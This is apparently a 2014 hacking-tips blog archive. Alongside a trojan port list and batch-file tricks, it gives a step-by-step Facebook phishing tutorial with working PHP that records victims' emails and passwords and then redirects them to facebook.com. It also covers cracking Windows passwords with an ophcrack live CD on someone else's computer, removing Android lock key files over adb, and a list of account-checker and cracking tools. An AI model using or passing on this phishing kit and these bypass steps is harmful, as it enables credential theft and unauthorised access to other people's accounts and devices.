Monday, 21 July 2014

List of Ports commonly used by Trojans

Please note that this isn't a complete list by any means, but it will give you an idea of what to look out for in Netstat. Be aware that some of the lower Ports may well be running valid services.

UDP: 1349 Back Ofrice DLL 31337 BackOfrice 1.20 31338 DeepBO 54321 BackOfrice 2000


TCP: 21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash 23 Tiny Telnet Server 25 Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30 31 Hackers Paradise 80 Executor 456 Hackers Paradise 555 Ini-Killer, Phase Zero, Stealth Spy 666 Satanz Backdoor 1001 Silencer, WebEx 1011 Doly Trojan 1170 Psyber Stream Server, Voice 1234 Ultors Trojan 1243 SubSeven 1.0 - 1.8 1245 VooDoo Doll 1492 FTP99CMP 1600 Shivka-Burka 1807 SpySender 1981 Shockrave 1999 BackDoor 1.00-1.03 2001 Trojan Cow 2023 Ripper 2115 Bugs 2140 Deep Throat, The Invasor 2801 Phineas Phucker 3024 WinCrash 3129 Masters Paradise 3150 Deep Throat, The Invasor 3700 Portal of Doom 4092 WinCrash 4567 File Nail 1 4590 ICQTrojan 5000 Bubbel 5000 Sockets de Troie 5001 Sockets de Troie 5321 Firehotcker 5400 Blade Runner 0.80 Alpha 5401 Blade Runner 0.80 Alpha 5402 Blade Runner 0.80 Alpha 5400 Blade Runner 5401 Blade Runner 5402 Blade Runner 5569 Robo-Hack 5742 WinCrash 6670 DeepThroat 6771 DeepThroat 6969 GateCrasher, Priority 7000 Remote Grab 7300 NetMonitor 7301 NetMonitor 7306 NetMonitor 7307 NetMonitor 7308 NetMonitor 7789 ICKiller 8787 BackOfrice 2000 9872 Portal of Doom 9873 Portal of Doom 9874 Portal of Doom 9875 Portal of Doom 9989 iNi-Killer 10067 Portal of Doom 10167 Portal of Doom 10607 Coma 1.0.9 11000 Senna Spy 11223 Progenic trojan 12223 Hack´99 KeyLogger 12345 GabanBus, NetBus 12346 GabanBus, NetBus 12361 Whack-a-mole 12362 Whack-a-mole 16969 Priority 20001 Millennium 20034 NetBus 2.0, Beta-NetBus 2.01 21544 GirlFriend 1.0, Beta-1.35 22222 Prosiak 23456 Evil FTP, Ugly FTP 26274 Delta 30100 NetSphere 1.27a 30101 NetSphere 1.27a 30102 NetSphere 1.27a 31337 Back Orifice 31338 Back Orifice, DeepBO 31339 NetSpy DK 31666 BOWhack 33333 Prosiak 34324 BigGluck, TN 40412 The Spy 40421 Masters Paradise 40422 Masters Paradise 40423 Masters Paradise 40426 Masters Paradise 47262 Delta 50505 Sockets de Troie 50766 Fore 53001 Remote Windows Shutdown 54321 SchoolBus .69-1.11 61466 Telecommando 65000 Devilwww.asdcybersecurity.com

Saturday, 19 July 2014

How to make a Green Matrix

@ echo off
color 0a
echo W
ping localhost -n .15 >nul
cls
echo WE
ping localhost -n .15 >nul
cls
echo WEL
ping localhost -n .15 >nul
cls
echo WELC
ping localhost -n .15 >nul
cls
echo WELCO
ping localhost -n .15 >nul
cls
echo WELCOM
ping localhost -n .15 >nul
cls
echo WELCOME
ping localhost -n .15 >nul
cls
echo WELCOME T
ping localhost -n .15 >nul
cls
echo WELCOME TO
ping localhost -n .15 >nul
cls
echo WELCOME TO A
ping localhost -n .15 >nul
cls
echo WELCOME TO AS
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-E
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ET
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETH
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHI
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHIC
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICA
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL H
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HA
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HAC
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACK
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKI
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKIN
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING S
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING SC
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING  SCH
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING SCHO
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING SCHOO
ping localhost -n .15 >nul
cls
echo WELCOME TO ASD-ETHICAL HACKING SCHOOL
ping localhost -n 5 >nul
cls
echo 3
ping localhost -n .15 >nul
cls
echo 3 2
ping localhost -n .15 >nul
cls
echo 3 2 1
ping localhost -n .15 >nul
cls
echo 3 2 1.
ping localhost -n .15 >nul
cls
echo 3 2 1..
ping localhost -n .15 >nul
cls
echo 3 2 1...
ping localhost -n .15 >nul
cls
echo 3 2 1....
ping localhost -n .15 >nul
cls
echo 3 2 1.....
ping localhost -n .15 >nul
cls
echo 3 2 1......
ping localhost -n 2 >nul
cls
:start
echo echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


Step 3:- Now save it as ASD.bat and Click on it.
             Enjoy your matrix with ASD-Ethical Hacking Schoolwww.asdcybersecurity.com
.........!!!!!

Crack Windows Password by Using a LiveCD

  1. Download the ophcrack live CD iso.
  2. Burn it to a CD.
  3. Place it in the computer you want to hack and set up the computer to boot from CD. You can set this up in the bios set up.
  4. Boot from CD in graphical mode and ophcrack will attempt to crack the passwords automatically.
  5. Note: if the CD is unable to find the password, this is because the admin password contains a special character. This means that to crack it you must first download the rainbow tables named xp special or vista special. The only way I know how to do this is through a torrent. Then you must put them on an eternal hard drive and use them with the live cd.www.asdcybersecurity.com
  6. Enjoy the password but DO NOT do anything against your school's wishes with it.

How to Hack Into a School Computer

Friday, 11 July 2014

How to Trace a Hacker ??

Know if someone is hacking your computer/ Trace a Hacker
Command Prompt hacks
Want to know if someone is hacking your computer? Command Prompt can help you find if someone you don't know is connected to your computer stealing private data. Just execute netstat -a and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).

2Command Prompt Tricks and Hacks Command Prompt Tricks, Hacks, and Secrets in Windows 8, 7, Vista, and XP

1. Use Ctrl-C to Abort a Command:- Just about any command can be stopped in its tracks with the abort command: Ctrl-C.

If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it
2. Run Command Prompt as an Administrator Automatically:-
You can always right-click on any Command Prompt shortcut and choose .Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user

Wednesday, 9 July 2014

Hacking FB by Phishing...Fake login page !!


I am gonna start my sharing by putting a basic tutorial on phishing which is highly in demand these days by newbies.
Disclaimer-: This tutorial is for educational and learning purpose only.I do not encourage internet users to try and use this or other hacking methods posted by me to do illegal activities online.If by any chance someone uses this information for any kind of cyber crime activities then i ( Tapan Jha) cant be held responsible by any means.

For making Phishing page for any site you need 3 types of files in common.They are
.Html file ( thats the fake page )
.Php file or any other action script page (for tracking the details that entered in page created by you)
.Txt file ( To save all the details in text format )
HOW TO MAKE FACEBOOK PHISHING PAGE
1. Open Facebook login page (make sure that the page is loaded completely) and right click and select view source or view source code option to see the source code of the loaded login page.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.

4. Just change the above code as mentioned below
action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html or (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com
6. By this step our PHP script is also ready,
7. Now host these 2 files
facebook.html
pass.php
in any of free hosting servers like ripway, drivehq ,110 mb ,000webhost.com, t35.com etc (or any other,you can just google the term "free hosting" ). Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook html page , then just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.
10. Thus....you can own that person's Fb account 

Sunday, 6 July 2014

How to Unlock a Android Pattern/Pin/Password Lock in Emergency:

To get your pattern lock or password of your android device unlocked

1 ) First of all, you need to switch off your android device and keep it for some time.
2 ) After switching of your android device, press your up ↑ volume button and Press It down.
3 ) Now press the power button and hold it too along with the volume up button.
4 ) It will start a secret terminal interface.
5 ) Then press to use home button for scroll volume up and down.
6 ) Then you will get to the choose option Delete All User Data.
7 ) Now in this way, your android lock pattern is unlocked now problem is solved.

How to Bypass Android Lock Patter using Kali Linux

Requirements for this Attack :
  1. Kali Linux
  2. An Android phone
  3. USB cable
  4. ADB Android Tool

Step 1.


1.First Boot your Kali Linux Distribution


2.Connect your phone to your PC using USB
 cable.

Step 2. 


1. Open up Terminal

 For Installing ADB over terminal

2.Boot into any Linux distro you have.

2.On your Terminal type :


#sudo apt-get install android-tools-adb


This will install ADB Android Tool on your Kali Linux Machine.

Step 3. 


Disabling pattern unlock over terminal

1.Open up terminal again and type :


#adb devices
#adb shell
#cd data/system
#su
#rm *.key


Now,

disconnect your phone and reboot.
Unlock pattern should be here. 
Just try some random gesture and it will get unlocked.

Enjoy the Hacking Tricks by Tapan Jha (Cyber Security Expert)

Thursday, 3 July 2014

A few cracking tools you will definitely LIKE

I. Crackers:
We have included the most easy to use and the best crackers out there, the following are all the crackers you'll ever need.

  1. C Force 1.01b 
  2. Apex 
  3. Villain 
  4. No Proxy Cracker 
  5. Teh hot file AIO 
  6. rsCracker3 
  7. Uploading Cracker 
  8. Rapids R Us 
  9. Hero

II. Proxy Leechers:
Proxessor & pl 6.5 should be enough for the proxy leeching part, proxessor leeches unlimited proxies in few seconds and most of them are valid

  1. Proxy leecher 6.5 
  2. Proxessor

III. Proxy Checkers:
Best proxy checkers just for you

  1. XNProxyChecker 
  2. Proxie checker By Dejay 
  3. Proxy Fire Master Suite Professional 1.23 
  4. Proxy Dragon 2.0 
  5. Proxy Smoker B2

IV. Account Checkers:
Interesting collection of account checkers.

  1. Deposit_Files_Profiler_v1.2 
  2. Flirt4Free_Checker 
  3. Steam Checker.exe 
  4. Oron_Account_Checker.exe 
  5. Profile_It_v1.6 
  6. Teh_Cam4_Checker 
  7. AIO Checker By Cricket 
  8. Rs Checker V3 
  9. Mega Upload Account Checker

V. Word list Tools:
Only the good ones!

  1. Athena II 
  2. Staph 1.25 
  3. OIE 4.1 
  4. Z Leecher 
  5. Epic Leech 
  6. AIO Leecher

Quickly Copy Your Data From Pen-drive By One Click

Written by $P!D3R
Every day we are using our pen drive for transfer our data. We pass and send
our data into pen drive then transfer from one computer to another for our
use. So that we need to copy any file from pen drive and share it into computer.
 We need to copy each folder and paste into our computer but what will be
the benefit if we can copy our file from pen drive by only one click. That
 time we no need to copy every file and every folder every time just we will
click one time and receive the data very easily and shortest time.
First create some folder in your pen drive. Remember the drive name like
 pen drive [I:\] or removal disk [G:]. Here I, G is the pen drive location.
 For example create three folders Music, Software, others into pen drive.
At the same way create same three folders in any drive into computer.
 For example I will copy the file into my D: drive, so I need to create
same three folders: Music, Software, others into D drive.
Now open notepad and write the code. Just copy this code and edit your
 way but don’t make a mistake.
----------------------------------------------------------------------------------------
copy J:\music\*.*
D:\music\
DEL /Q J:\music\*.*
EXIT
------------------------------------------------------------------------------------
Save it by a name. Like I am saving this as Music.bat [.bat is the extension
 of batch program]
Now open a new notepad document. And write the same code for Software folders.
--------------------------------------------------------------------------------------
copy J:\Software\*.*
D:\Software\
DEL /Q J:\Software\*.*
EXIT
------------------------------------------------------------------------------------
Same way save this as software.bat & create a new notepad document.
Write the same code for others folders
----------------------------------------------------------------------------------
copy J:\others\*.*
D:\others\
DEL /Q J:\others\*.*
EXIT
----------------------------------------------------------------------------------
Save it by others.bat
Now the last step. Create a new notepad document. And write
---------------------------------------------------------------------------------
start Music.bat
start software.bat
start others.bat
------------------------------------------------------------------------------


Save it by a name like Auto-copy.bat and save it in desktop or anywhere in
 the computer. Now for testing copy some files in the folder of your pen-drive
 and after that click Auto-copy.bat ! I hope it will start copy the files from
pen drive in to the computer.
Double file name

Step 1. First open notepad, then type or copy this code in notepad

@ECHO OFF
CLS
ECHO Renaming all directories
FOR /D %%f IN (*) DO RENAME "%%f" "%%f %%f"

ECHO Renaming all files
FOR %%f IN (*) DO RENAME "%%f" "%%f %%f"

EXIT

Step 2. then save it doublename.bat ;)

Enjoy the trick